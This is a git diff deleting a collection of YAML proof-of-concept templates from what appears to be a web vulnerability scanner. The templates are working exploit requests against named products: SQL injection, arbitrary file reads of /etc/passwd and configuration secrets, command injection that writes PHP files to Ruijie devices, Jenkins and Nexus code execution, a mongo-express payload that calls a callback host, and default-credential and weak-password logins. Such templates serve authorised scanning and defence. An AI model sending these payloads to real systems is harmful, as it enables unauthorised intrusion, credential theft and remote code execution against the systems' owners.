WebScan/pocs/fangweicms-sqli.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-fangweicms-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23
expression: |
response.body.bcontains(bytes(md5(string(rand))))
detail:
author: Rexus
Affected Version: "4.3"
links:
- http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/

11
WebScan/pocs/finereport-v8-arbitrary-file-read.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-finereport-v8-arbitrary-file-read
rules:
- method: GET
path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA")
detail:
author: Facker007(https://github.com/Facker007)
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8

11
WebScan/pocs/flir-ax8-file-read.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-flir-ax8-file-read
rules:
- method: GET
path: "/download.php?file=/etc/passwd"
follow_redirects: false
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: Print1n(http://print1n.top)
links:
- https://juejin.cn/post/6961370156484263972

15
WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-gitlab-cnvd-2021-14193-infoleak
rules:
- method: POST
path: /api/graphql
headers:
Content-Type: application/json
body: >-
{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl"))
detail:
author: 说书人(http://python.vin/)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275

10
WebScan/pocs/h3c-secparh-any-user-login.yml
View File

@ -1,10 +0,0 @@
name: poc-yaml-h3c-secparh-any-user-login
rules:
- method: GET
path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
expression: |
response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body))
detail:
author: Print1n(https://print1n.top)
links:
- https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E

11
WebScan/pocs/hikvision-cve-2017-7921.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-hikvision-cve-2017-7921
rules:
- method: GET
path: /system/deviceInfo?auth=YWRtaW46MTEK
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<firmwareVersion>") && response.headers["content-type"] == "application/xml"
detail:
author: whwlsfb(https://github.com/whwlsfb)
links:
- https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html

21
WebScan/pocs/iis6.0-put.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-iis-put-getshell
set:
filename: randomLowercase(6)
fileContent: randomLowercase(6)
rules:
- method: PUT
path: /{{filename}}.txt
body: |
{{fileContent}}
expression: |
response.status == 201
- method: GET
path: /{{filename}}.txt
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(fileContent))
detail:
author: Cannae(github.com/thunderbarca)
links:
- https://www.cnblogs.com/-mo-/p/11295400.html

15
WebScan/pocs/jboss-cve-2010-1871.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-jboss-cve-2010-1871
set:
r1: randomInt(8000000, 10000000)
r2: randomInt(8000000, 10000000)
rules:
- method: GET
path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"].contains(string(r1 * r2))
detail:
author: fuping
links:
- http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871

11
WebScan/pocs/jboss-unauth.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-jboss-unauth
rules:
- method: GET
path: /jmx-console/
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://xz.aliyun.com/t/6103

14
WebScan/pocs/jenkins-cve-2018-1000861-rce.yml
View File

@ -1,14 +0,0 @@
name: poc-yaml-jenkins-cve-2018-1000861-rce
set:
rand: randomLowercase(4)
rules:
- method: GET
path: >-
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload;
follow_redirects: false
expression: >-
response.status == 200 && response.body.bcontains(bytes("package#" + rand))
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861

21
WebScan/pocs/jenkins-unauthorized-access.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-jenkins-unauthorized-access
set:
r1: randomInt(1000, 9999)
r2: randomInt(1000, 9999)
rules:
- method: GET
path: /script
follow_redirects: false
expression: response.status == 200
search: |
"Jenkins-Crumb", "(?P<var>.+?)"\);
- method: POST
path: /script
body: |
script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C
expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2)))
detail:
author: MrP01ntSun(https://github.com/MrPointSun)
links:
- https://www.cnblogs.com/yuzly/p/11255609.html
- https://blog.51cto.com/13770310/2156663

21
WebScan/pocs/jumpserver-unauth-rce.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-jumpserver-unauth-rce
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /api/v1/authentication/connection-token/
follow_redirects: false
expression: |
response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- method: GET
path: /api/v1/authentication/connection-token/?user-only={{r1}}
follow_redirects: false
expression: |
response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
detail:
author: mvhz81
info: jumpserver unauth read logfile + jumpserver rce
links:
- https://s.tencent.com/research/bsafe/1228.html
- https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh

21
WebScan/pocs/jumpserver-unauth-rce2.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-jumpserver-unauth-rce
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /api/v1/users/connection-token/
follow_redirects: false
expression: |
response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- method: GET
path: /api/v1/users/connection-token/?user-only={{r1}}
follow_redirects: false
expression: |
response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
detail:
author: mvhz81
info: jumpserver unauth read logfile + jumpserver rce
links:
- https://s.tencent.com/research/bsafe/1228.html
- https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh

12
WebScan/pocs/kingsoft-v8-default-password.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-kingsoft-v8-default-password
rules:
- method: POST
path: /inter/ajax.php?cmd=get_user_login_cmd
body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}"
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://idc.wanyunshuju.com/aqld/2123.html

12
WebScan/pocs/kingsoft-v8-file-read.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-kingsoft-v8-file-read
rules:
- method: GET
path: >-
/htmltopdf/downfile.php?filename=/windows/win.ini
follow_redirects: false
expression: |
response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

11
WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-landray-oa-custom-jsp-fileread
rules:
- method: POST
path: /sys/ui/extend/varkind/custom.jsp
body: var={"body":{"file":"file:///c://windows/win.ini"}}
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw

11
WebScan/pocs/landray-oa-custom-jsp-fileread.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-landray-oa-custom-jsp-fileread
rules:
- method: POST
path: /sys/ui/extend/varkind/custom.jsp
body: var={"body":{"file":"file:///etc/passwd"}}
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw

12
WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-lanproxy-cve-2021-3019-lfi
rules:
- method: GET
path: "/../conf/config.properties"
expression: |
response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
Affected Version: "lanproxy 0.1"
links:
- https://github.com/ffay/lanproxy/issues/152
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019

11
WebScan/pocs/laravel-debug-info-leak.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-laravel-debug-info-leak
rules:
- method: POST
path: /
follow_redirects: false
expression: >
response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment &amp; details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php"))
detail:
author: Dem0ns (https://github.com/dem0ns)
links:
- https://github.com/dem0ns/improper/tree/master/laravel/5_debug

11
WebScan/pocs/laravel-improper-webdir.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-laravel-improper-webdir
rules:
- method: GET
path: /storage/logs/laravel.log
follow_redirects: false
expression: >
response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace"))
detail:
author: Dem0ns (https://github.com/dem0ns)
links:
- https://github.com/dem0ns/improper

21
WebScan/pocs/mongo-express-cve-2019-10758.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-mongo-express-cve-2019-10758
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
- method: POST
path: /checkValid
headers:
Authorization: Basic YWRtaW46cGFzcw==
body: >-
document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}')
follow_redirects: true
expression: >
reverse.wait(5)
detail:
vulnpath: '/checkValid'
author: fnmsd(https://github.com/fnmsd)
description: 'Mongo Express CVE-2019-10758 Code Execution'
links:
- https://github.com/masahiro331/CVE-2019-10758
- https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html

19
WebScan/pocs/netentsec-ngfw-rce.yml
View File

@ -1,19 +0,0 @@
name: poc-yaml-netentsec-ngfw-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
r3: randomInt(800000000, 1000000000)
r4: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /directdata/direct/router
body: >-
{"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
expression: response.status == 200
- method: GET
path: /{{r2}}
expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4)))
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

20
WebScan/pocs/nexus-cve-2019-7238.yml
View File

File diff suppressed because one or more lines are too long

21
WebScan/pocs/nexus-cve-2020-10199.yml
View File

@ -1,21 +0,0 @@
name: poc-yaml-nexus-cve-2020-10199
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: "/rest/beta/repositories/go/group"
headers:
Content-Type: application/json
body: |
{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}}
expression: |
response.status == 400 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "nexus<3.21.2"
author: kingkk(https://www.kingkk.com/)
links:
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- https://www.cnblogs.com/magic-zero/p/12641068.html
- https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

20
WebScan/pocs/nexus-cve-2020-10204.yml
View File

@ -1,20 +0,0 @@
name: poc-yaml-nexus-cve-2020-10204
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: "/extdirect"
headers:
Content-Type: application/json
body: |
{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "nexus<3.21.2"
author: kingkk(https://www.kingkk.com/)
links:
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- https://www.cnblogs.com/magic-zero/p/12641068.html
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

22
WebScan/pocs/nexus-default-password.yml
View File

@ -1,22 +0,0 @@
name: poc-yaml-nexus-default-password
rules:
- method: GET
path: /nexus/service/siesta/capabilities
expression: >
response.status == 401
- method: GET
path: /nexus/service/local/authentication/login
headers:
Accept: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
expression: >
response.status == 200
- method: GET
path: /nexus/service/siesta/capabilities
expression: >
response.status == 200
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Nexus Repository Manager OSS"
links:
- https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager

11
WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion
rules:
- method: GET
path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
follow_redirects: false
expression: >-
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613

13
WebScan/pocs/phpmyadmin-setup-deserialization.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-phpmyadmin-setup-deserialization
rules:
- method: POST
path: /scripts/setup.php
body: >-
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
follow_redirects: false
expression: >-
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

19
WebScan/pocs/phpstudy-backdoor-rce.yml
View File

@ -1,19 +0,0 @@
name: poc-yaml-phpstudy-backdoor-rce
set:
r: randomLowercase(6)
payload: base64("printf(md5('" + r + "'));")
rules:
- method: GET
path: /index.php
headers:
Accept-Encoding: 'gzip,deflate'
Accept-Charset: '{{payload}}'
follow_redirects: false
expression: |
response.body.bcontains(bytes(md5(r)))
detail:
author: 17bdw
Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
vuln_url: "php_xmlrpc.dll"
links:
- https://www.freebuf.com/column/214946.html

29
WebScan/pocs/poc-yaml-weblogic-console-weak.yml
View File

@ -1,29 +0,0 @@
name: poc-yaml-weblogic-console-weak
sets:
username:
- weblogic
password:
- weblogic
- weblogic1
- welcome1
- Oracle@123
- weblogic123
payload:
- UTF-8
rules:
- method: HEAD
path: /console/j_security_check
follow_redirects: false
expression: |
response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
- method: POST
path: /console/j_security_check
follow_redirects: false
headers:
Content-type: application/x-www-form-urlencoded
body: |
j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
expression: |
!response.body.bcontains(b"LoginForm.jsp")
detail:
author: shadown1ng(https://github.com/shadown1ng)

BIN
WebScan/pocs/pocs.zip Normal file
View File

Binary file not shown.

12
WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-qizhi-fortressaircraft-unauthorized
rules:
- method: GET
path: >-
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
expression: |
response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计")
detail:
author: we1x4n(https://we1x4n.com/)
links:
- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw

12
WebScan/pocs/rockmongo-default-password.yml
View File

@ -1,12 +0,0 @@
name: poc-yaml-rockmongo-default-password
rules:
- method: POST
path: /index.php?action=login.index&host=0
body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://www.runoob.com/mongodb/working-with-rockmongo.html

24
WebScan/pocs/ruijie-eg-info-leak.yml
View File

@ -1,24 +0,0 @@
name: poc-yaml-ruijie-eg-info-leak
rules:
- method: POST
path: /login.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=admin&password=admin?show+webmaster+user
expression: "true"
search: |
{"data":".*?(?P<username>\w+)\s?(?P<password>\w+)","status":1}
- method: POST
path: /login.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username={{username}}&password={{password}}
expression: |
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
detail:
author: Search?=Null
description: "Ruijie EG网关信息泄漏"
links:
- https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ

29
WebScan/pocs/ruijie-eg-rce.yml
View File

@ -1,29 +0,0 @@
name: poc-yaml-ruijie-eg-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
phpcode: >
"<?php echo '" + r1 + "'; unlink(__FILE__); ?>"
payload: base64(phpcode)
rules:
- method: POST
path: "/guest_auth/guestIsUp.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
Accept-Encoding: "gzip, deflate"
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
body: |
ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
expression: |
response.status == 200
- method: GET
path: "/guest_auth/{{r2}}.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
Accept-Encoding: "gzip, deflate"
expression: |
response.body.bcontains(bytes(r1))
detail:
author: White(https://github.com/WhiteHSBG)
links:
- https://xz.aliyun.com/t/9016?page=1

15
WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-ruijie-nbr1300g-cli-password-leak
rules:
- method: POST
path: /WEB_VMS/LEVEL15/
follow_redirects: false
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: |
command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
expression: |
response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest"))
detail:
author: abbin777
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

20
WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml
View File

@ -1,20 +0,0 @@
name: poc-yaml-ruijie-rce-cnvd-2021-09650
set:
r1: randomLowercase(9)
rules:
- method: POST
path: /guest_auth/guestIsUp.php
body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: /guest_auth/{{r1}}.txt
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"uid")
detail:
author: jdr
info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE)
links:
- https://github.com/opsxcq/exploit-CVE-2014-6271/

11
WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-ruijie-uac-cnvd-2021-14536
rules:
- method: GET
path: /login.php
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
detail:
author: jweny(https://github.com/jweny)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065

22
WebScan/pocs/saltstack-cve-2021-25282-file-write.yml
View File

@ -1,22 +0,0 @@
name: poc-yaml-saltstack-cve-2021-25282-file-write
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /run
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
- method: POST
path: /run
headers:
Content-type: application/json
body: >-
{"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
detail:
author: jweny(https://github.com/jweny)
links:
- https://www.anquanke.com/post/id/232748

13
WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-sangfor-edr-arbitrary-admin-login
rules:
- method: GET
path: /ui/login.php?user=admin
follow_redirects: false
expression: >
response.status == 302 &&
response.body.bcontains(b"/download/edr_installer_") &&
response.headers["Set-Cookie"] != ""
detail:
author: hilson
links:
- https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA

15
WebScan/pocs/sangfor-edr-cssp-rce.yml
View File

@ -1,15 +0,0 @@
name: poc-yaml-sangfor-edr-cssp-rce
rules:
- method: POST
path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
headers:
Content-Type: application/x-www-form-urlencoded
body: >-
{"params":"w=123\"'1234123'\"|id"}
expression: >
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)")
detail:
author: x1n9Qi8
Affected Version: "Sangfor EDR 3.2.17R1/3.2.21"
links:
- https://www.cnblogs.com/0day-li/p/13650452.html

14
WebScan/pocs/sangfor-edr-tool-rce.yml
View File

@ -1,14 +0,0 @@
name: poc-yaml-sangfor-edr-tool-rce
set:
r1: randomLowercase(8)
r2: randomLowercase(8)
rules:
- method: GET
path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}"
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2))
detail:
author: cookie
links:
- https://edr.sangfor.com.cn/

11
WebScan/pocs/seeyon-a6-employee-info-leak.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-seeyon-a6-employee-info-leak
rules:
- method: GET
path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
expression:
response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md

13
WebScan/pocs/seeyon-a6-test-jsp-sql.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-seeyon-a6-test-jsp-sql
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md

16
WebScan/pocs/seeyon-ajax-unauthorized-access.yml
View File

@ -1,16 +0,0 @@
name: poc-yaml-seeyon-ajax-unauthorized-access
rules:
- method: GET
path: /seeyon/thirdpartyController.do.css/..;/ajax.do
expression: |
response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
- method: GET
path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
expression: |
response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
detail:
author: x1n9Qi8
links:
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- https://buaq.net/go-53721.html

11
WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml
View File

@ -1,11 +0,0 @@
name: poc-yaml-seeyon-cnvd-2020-62422-readfile
rules:
- method: GET
path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
detail:
author: Aquilao(https://github.com/Aquilao)
info: seeyon readfile(CNVD-2020-62422)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422

10
WebScan/pocs/seeyon-session-leak.yml
View File

@ -1,10 +0,0 @@
name: poc-yaml-seeyon-session-leak
rules:
- method: GET
path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
expression:
response.status == 200 && response.body.bcontains(b"<SessionList>\r\n<Session>\r\n<usrID>")
detail:
author: sakura404x
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md

13
WebScan/pocs/seeyon-setextno-jsp-sql.yml
View File

@ -1,13 +0,0 @@
name: poc-yaml-seeyon-setextno-jsp-sql
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md

19
WebScan/pocs/seeyon-unauthoried.yml
View File

@ -1,19 +0,0 @@
